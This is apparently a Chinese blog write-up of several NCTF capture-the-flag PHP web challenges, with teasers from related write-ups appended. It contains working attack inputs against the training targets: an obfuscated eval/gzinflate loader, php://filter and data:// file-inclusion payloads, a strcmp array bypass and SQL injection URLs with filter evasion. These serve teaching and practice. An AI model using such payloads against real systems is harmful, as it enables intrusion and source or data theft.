nctf-php

最新推荐文章于 2021-11-14 17:30:53 发布
原创 最新推荐文章于 2021-11-14 17:30:53 发布 · 2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

一:nctf-php-decode
http://ctf.nuptsast.com/challenges#php%20decode

<?php
function CLsI($ZzvSWE) {

$ZzvSWE = gzinflate(base64_decode($ZzvSWE));

for ($i = 0; $i < strlen($ZzvSWE); $i++) {

    $ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);

}

return $ZzvSWE;

}eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));?>

解码
http://ddecode.com/phpdecoder/

这里写图片描述

对照ascii码表
php info();nctf{gzip_base64_hhhhhh}

二:文件包含
http://ctf.nuptsast.com/challenges#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB

点开http://4.chinalover.sinaapp.com/web7/index.php 有个
click me? no
提示不用点击,好吧,还是点击看看,转到
http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
解题方法:
GET or POST
file=php://filter/read=convert.base64-encode/resource=index.php&submit=%E6%8F%90%E4%BA%A4
可获得 base64 编码的 index.php
这里写图片描述

base64解码

<html>
    <title>asdf</title>

<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

三:听说PHP是世界上最好的语言
http://way.nuptzj.cn/php/index.php
提示:Can you authenticate to this website? index.txt
访问:http://way.nuptzj.cn/php/index.txt
得到

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

这里写图片描述

四:http://115.28.150.176/strcmp/index.php

<?php
$pass=@$_POST['pass'];
$pass1=*;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

tip:strcmp(array,string)=null=0

这里写图片描述
改如下,得到flag
这里写图片描述

五:http://chinalover.sinaapp.com/web11/
提示Do you know robots.txt?
访问http://chinalover.sinaapp.com/web11/robots.txt
这里写图片描述
改如下,得到flag
这里写图片描述

南邮平台 文件包含漏洞题
qq_41497476的博客
05-24 467
当无法判断allow_url_fopen,allow_url_include的开启状态时,可逐一尝试如下的请求判断哪些能够执行 1.?file=data:text/plain,<?php phpinfo()?> 2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 3.?file=php://input...
NCTF-Writeup
Yukikaze_cxy
05-30 1865
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
NCTF-2018-PWN之假的真PWN的writeup
单核CPU的小朋友的博客
11-17 3万+
首先按照题目要求下载文件。很容易通过该源代码看出危险函数gets会覆盖结构体的地址。 这里题目要求我们使用nc命令。但是很明显我们需要通过16进制数来进行攻击,而\X在nc中会被转换成实体,所以我们并不能通过NC来进行攻击。这也是我之前在做这类PWN题的时候所遇到的问题。 现在先放出题目地址,https://nctf.x1c.club/challenges#Pwn python脚本 我们可以通过...
XCTF-攻防世界CTF平台-Web类——4、Web_php_include(phpstrstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3681
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
ctf-学习笔记10.15-10.17
Sacrifice_li的博客
10-17 686
最近在做ctfweb题,在bugkuctf平台上,不知道最近实验吧发生了什么。 记录一下10.15-10.17号的学习笔记吧 php方面: 1.strstr()函数: echo strstr("hello world!","world"); 查找world,在hello world中是否存在,如果在,返回该字符串及后面剩余部分 2.substr函数() 类似于string的查询 subs...
zcmu-1108 松哥的困惑(简单的字符串匹配)
欢迎访问方偲的博客
07-29 858
【题述】 Description 都到世界末日了,松哥都没找到女朋友,因此松哥感到很困惑.没想到到了世界末日都没人喜欢我.松哥一生气就发布了征友启事,第二天,一共有n个人报名应征松哥女友.松哥对女友的要求有三点,第一点,名字必须有三个字,第二点,名字中要带Li,第三点名字中要带Ting.松哥希望你能从n个人中.松哥决定选取一人并和她约会.你能找到是谁嘛? Input 多组测试数据. 每...
南邮ctf nctf CG-CTF web题writeup
XQin9T1an的博客
08-03 3157
0x01 签到题 题目链接:http://chinalover.sinaapp.com/web1/ 查看源码可得到flag flag:nctf{flag_admiaanaaaaaaaaaaa} 0x02 md5 collision 题目链接:http://chinalover.sinaapp.com/web19/ 题目给了源码 $md51 = md5('QNKCDZO'); $a = @$_G...
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 1186
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
nctf 2018 web复现-手工sql注入
weidaxueshen1的博客
11-28 397
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHEMA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名 http://ctfgame.acdxvfsvd.net:20001...
[NCTF2019] web题-SQLi
BROTHERYY的博客
12-30 264
访问robots.txt发现hint.txt 继续访问hint.txt得到过滤信息 根据过滤信息写脚本进行注入 import requests import string from urllib import parse passwd = '' string = string.ascii_lowercase + string.digits + '_' url = 'http://7a1bc649-4a1d-4e5b-a7cd-cb187958a399.node3.buuoj.cn/index.ph.
strchr和strstr的作用
幻想之渔
03-19 1710
strchr和strstr的作用 strchr:在一个字符串中找一个字符,返回该字符第一次出现时的地址strstr:在一个字符串中找一个字符串,返回该字符串第一次出现时的首地址
buuctf解题记录
song_10的博客
05-21 676
buuctf部分pwn题题解
CTF-Pwn-[BJDCTF 2nd]test
归子莫的博客
05-06 1762
CTF-Pwn-[BJDCTF 2nd]test 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]test 这个题目需要使用ssh连接 Username: ctf P...
bugCTF(备份是个好习惯)
欢迎光临
06-17 1907
preg_match()是正则表达式/w 表示
CTF常见的php函数
qq_42812036的博客
04-03 4588
4.3 str_replace(find,replace,string,count):在字符串sting中找到字符串find,并把它替换成replace; eg: str=str_replace(key,’ ',$str) 空字符串代替 str里的 key count 可选。对替换数进行计数的变量。 strstr(string,search,before_search):找到search字符...
CG-CTF Web 1-10 Write Up
Mysmycbx的博客
09-02 471
一 签到题 打开网站地址 右键查看网页源代码得到flag: nctf{flag_admiaanaaaaaaaaaaa} 二 md5 collision 有一段php源码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == ...
NCTF 南京邮电大学网络攻防训练平台 WriteUp
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
NCTF 南京邮电大学网络攻防平台 writeup(web部分)持续更新
Taowood的博客
07-22 8504
题目来源,南京邮电大学网络攻防训练平台 http://ctf.nuptzj.cn/   一、签到题 迷雾与真相就隔着一个F12,得flag ctf{flag_admiaanaaaaaaaaaaa}   二、md5 collision 题目描述如下 源码 &lt;?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5...
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到题这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
nctf web
最新发布
03-22
### NCTF Web Challenges and Resources NCTF (National Cybersecurity Talent Competition) is a well-known competition that focuses on cybersecurity skills, including web security challenges. These challenges are designed to test participants' abilities in identifying vulnerabilities within web applications and exploiting them ethically. The website mentioned in the reference provides access to various Capture The Flag (CTF) competitions where contestants can engage with different types of challenges, such as web-based ones[^1]. Participants often encounter tasks involving SQL injection, cross-site scripting (XSS), command injection, insecure deserialization, and more advanced techniques like bypassing authentication mechanisms or exploiting server-side request forgery (SSRF). For those interested specifically in NCTF's web-related content, it’s recommended to explore past challenge archives from official sources when available. Additionally, there exist several platforms hosting similar CTF-style exercises which could serve as supplementary material: #### Example Code for Testing XSS Vulnerability Below demonstrates how one might check whether an input field allows reflected Cross-Site Scripting attacks. ```javascript // Simple payload used during testing phase alert('This shows potential vulnerability'); ``` Such scripts should only execute under conditions indicating improper sanitization processes at play—highlighting areas needing remediation efforts before deployment into production environments.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值